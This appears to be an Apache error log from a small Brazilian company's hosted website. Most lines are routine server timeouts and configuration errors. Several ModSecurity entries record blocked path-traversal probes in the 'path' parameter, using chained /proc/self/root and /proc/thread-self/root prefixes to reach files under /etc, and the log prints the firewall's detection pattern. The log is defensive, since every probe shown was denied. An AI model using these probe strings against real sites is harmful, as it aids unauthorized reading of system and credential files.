[Wed Mar 18 20:46:35.258658 2026] [:error] [pid 27293:tid 140411741927168] [client 74.7.243.128:47678] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs5W_-YZRR_7pZ7nDI1zgAAA8A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 20:46:35.736941 2026] [:error] [pid 9530:tid 140411574073088] [client 74.7.244.43:42880] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abs5WwSuyh5UNeevTVfoewAAAxQ"]
[Wed Mar 18 20:46:47.541897 2026] [proxy_fcgi:error] [pid 30077:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:49264] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:47:10.033807 2026] [proxy_fcgi:error] [pid 17887:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:49932] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:47:29.319647 2026] [mime_magic:error] [pid 27403:tid 140411616036608] (70014)End of file found: [client 57.141.18.16:51802] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 20:47:33.090112 2026] [proxy_fcgi:error] [pid 29882:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:50410] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:47:48.572111 2026] [mime_magic:error] [pid 14269:tid 140411624429312] (70014)End of file found: [client 57.141.18.123:51686] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 20:47:55.037802 2026] [proxy_fcgi:error] [pid 30077:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:50818] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:48:10.877785 2026] [mime_magic:error] [pid 14269:tid 140411691570944] (70014)End of file found: [client 57.141.18.89:52626] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 20:48:18.265775 2026] [proxy_fcgi:error] [pid 11816:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:51224] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:48:20.219373 2026] [:error] [pid 9530:tid 140411691570944] [client 74.7.228.61:41604] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abs5xASuyh5UNeevTVfooAAAAwY"]
[Wed Mar 18 20:48:31.293253 2026] [core:alert] [pid 17887:tid 140411540502272] [client 57.141.18.41:53098] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Wed Mar 18 20:48:41.017545 2026] [mime_magic:error] [pid 29882:tid 140411574073088] (70014)End of file found: [client 57.141.18.23:53196] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 20:48:43.003227 2026] [proxy_fcgi:error] [pid 27403:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:51738] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:49:04.223400 2026] [core:alert] [pid 14269:tid 140411691570944] [client 57.141.18.52:53372] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Wed Mar 18 20:49:04.666211 2026] [mime_magic:error] [pid 17887:tid 140411699963648] (70014)End of file found: [client 57.141.18.33:53624] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 20:49:07.097815 2026] [proxy_fcgi:error] [pid 26799:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:52246] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:49:22.160715 2026] [:error] [pid 11816:tid 140411708356352] [client 74.7.243.128:40336] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs6Auw_le52K8_3pV0fFQAAAgQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 20:49:34.099120 2026] [proxy_fcgi:error] [pid 15051:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:52692] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:49:34.917900 2026] [mime_magic:error] [pid 29882:tid 140411574073088] (70014)End of file found: [client 57.141.18.67:54150] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 20:49:38.774890 2026] [:error] [pid 11816:tid 140411708356352] [client 216.73.216.191:2037] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs6Euw_le52K8_3pV0fHgAAAgQ"]
[Wed Mar 18 20:50:10.045924 2026] [proxy_fcgi:error] [pid 26799:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:53332] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:50:40.113866 2026] [proxy_fcgi:error] [pid 15051:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:53888] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:50:41.179228 2026] [mime_magic:error] [pid 29882:tid 140411582465792] (70014)End of file found: [client 74.7.241.31:57970] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/var/run
[Wed Mar 18 20:50:52.588026 2026] [:error] [pid 11816:tid 140411733534464] [client 74.7.243.128:57000] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs6XOw_le52K8_3pV0fOQAAAgE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 20:51:08.429828 2026] [proxy_fcgi:error] [pid 15051:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:54434] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:51:34.130598 2026] [proxy_fcgi:error] [pid 31803:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:55164] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:51:36.538486 2026] [:error] [pid 31803:tid 140411649607424] [client 74.7.244.43:58976] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abs6iOyqAr6etmhZHNoL7AAAAEs"]
[Wed Mar 18 20:51:38.176697 2026] [:error] [pid 30077:tid 140411733534464] [client 74.7.243.128:36178] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs6ivu8EFLIOrSqIptC5gAAAkE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 20:51:45.850498 2026] [:error] [pid 26799:tid 140411624429312] [client 74.7.243.128:57300] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs6kda6ubjKNq_cu4bf7gAAA04"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 20:51:59.123525 2026] [proxy_fcgi:error] [pid 27293:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:55974] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:52:03.133274 2026] [:error] [pid 17887:tid 140411574073088] [client 74.7.243.128:57310] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs6owkwaGbbGflqUZBXoAAAANQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 20:52:06.200962 2026] [:error] [pid 17887:tid 140411574073088] [client 74.7.243.128:51444] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs6pgkwaGbbGflqUZBXpAAAANQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 20:52:21.129787 2026] [proxy_fcgi:error] [pid 9800:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:56528] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:52:30.870663 2026] [:error] [pid 15051:tid 140411632822016] [client 74.7.243.128:51452] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs6vimAPhZkrhU8w4ms5wAAAI0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 20:52:43.125775 2026] [proxy_fcgi:error] [pid 15826:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:56988] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:52:52.126837 2026] [:error] [pid 15051:tid 140411632822016] [client 74.7.243.128:59076] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs61CmAPhZkrhU8w4ms9AAAAI0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 20:53:06.129842 2026] [proxy_fcgi:error] [pid 9800:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:57434] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:53:21.102222 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.228.61:46546] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abs68da6ubjKNq_cu4bf9QAAA0Y"]
[Wed Mar 18 20:53:28.139225 2026] [proxy_fcgi:error] [pid 9530:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:57886] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:53:48.171399 2026] [mime_magic:error] [pid 15051:tid 140411674785536] (70014)End of file found: [client 74.7.243.128:47192] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/lib/kbd/keymaps/legacy
[Wed Mar 18 20:53:50.133801 2026] [proxy_fcgi:error] [pid 30077:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:58320] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:54:13.121988 2026] [proxy_fcgi:error] [pid 17887:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:58730] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:54:36.384598 2026] [proxy_fcgi:error] [pid 14269:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:59158] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:55:00.665847 2026] [proxy_fcgi:error] [pid 14269:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:59592] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:55:23.386545 2026] [:error] [pid 9800:tid 140411557287680] [client 74.7.243.128:50846] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs7a4JpNEVVDhwB8vOH5gAAA5Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 20:55:28.255257 2026] [:error] [pid 9800:tid 140411666392832] [client 74.7.243.128:55558] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs7cIJpNEVVDhwB8vOH6wAAA4k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 20:55:28.279779 2026] [proxy_fcgi:error] [pid 26799:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:60044] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:55:36.044244 2026] [:error] [pid 9530:tid 140411624429312] [client 74.7.243.128:60050] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs7eASuyh5UNeevTVfpBAAAAw4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 20:55:53.789970 2026] [proxy_fcgi:error] [pid 15051:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:60534] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:56:14.395751 2026] [:error] [pid 29882:tid 140411741927168] [client 74.7.243.128:60056] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs7nkzinOy1jxa1j4diwgAAAQA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 20:56:20.469872 2026] [proxy_fcgi:error] [pid 15051:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:32888] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:56:44.949869 2026] [proxy_fcgi:error] [pid 29882:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:33318] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:56:45.204221 2026] [:error] [pid 29882:tid 140411582465792] [client 74.7.244.43:52166] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abs7vUzinOy1jxa1j4dizAAAARM"]
[Wed Mar 18 20:57:07.138437 2026] [proxy_fcgi:error] [pid 17887:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:33612] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:57:29.102101 2026] [proxy_fcgi:error] [pid 27293:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:33896] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:57:51.110003 2026] [proxy_fcgi:error] [pid 15826:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:34146] AH01075: Error dispatching request to : (polling)
